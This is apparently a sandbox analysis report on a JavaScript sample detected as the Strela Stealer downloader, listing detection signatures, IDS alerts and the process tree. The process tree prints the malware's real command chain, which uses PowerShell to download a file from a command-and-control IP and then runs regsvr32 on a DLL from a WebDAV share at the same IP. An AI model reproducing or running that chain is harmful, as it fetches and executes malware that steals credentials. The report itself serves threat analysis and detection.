Edit tour
Windows
Analysis Report
2067419799306291220.js
Overview
General Information
| Sample name: | 2067419799306291220.js |
| Analysis ID: | 1588859 |
| MD5: | 7dc103d50664fb6e9f06b1120485bbc6 |
| SHA1: | a5a6363de1ffe96014ed1c295515a7c59a971e55 |
| SHA256: | 460a3f60ffcbb7cd45890f26780ecb226d1dba38ae7b6277144021d2b63e96a3 |
| Tags: | jsStrelaStealeruser-threatcat_ch |
| Infos: |   |
 | |
Detection
Strela Downloader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Gathers information about network shares
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 7032 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\20674 1979930629 1220.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 2724 cmdline: "C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \747824018 4849.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 4944 cmdline: powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) 
Acrobat.exe (PID: 7412 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 7660 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7856 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 00 --field -trial-han dle=1756,i ,727159845 177561612, 1264362202 8532532394 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
svchost.exe (PID: 7720 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): | ||
| Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: | ||
| Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: frack113, Nasreddine Bencherchali: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: frack113: | ||
| Source: | Author: vburov: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T06:24:40.888130+0100 | 2859560 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49708 | 193.143.1.205 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T06:24:45.119504+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49730 | 193.143.1.205 | 8888 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T06:24:40.888130+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49708 | 193.143.1.205 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Virustotal: | Perma Link | ||
Software Vulnerabilities | |
|---|
| Source: | Argument value : | Go to definition | ||
| Source: | Argument value : | Go to definition | ||
| Source: | Child: | ||
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Bad PDF prefix: | ||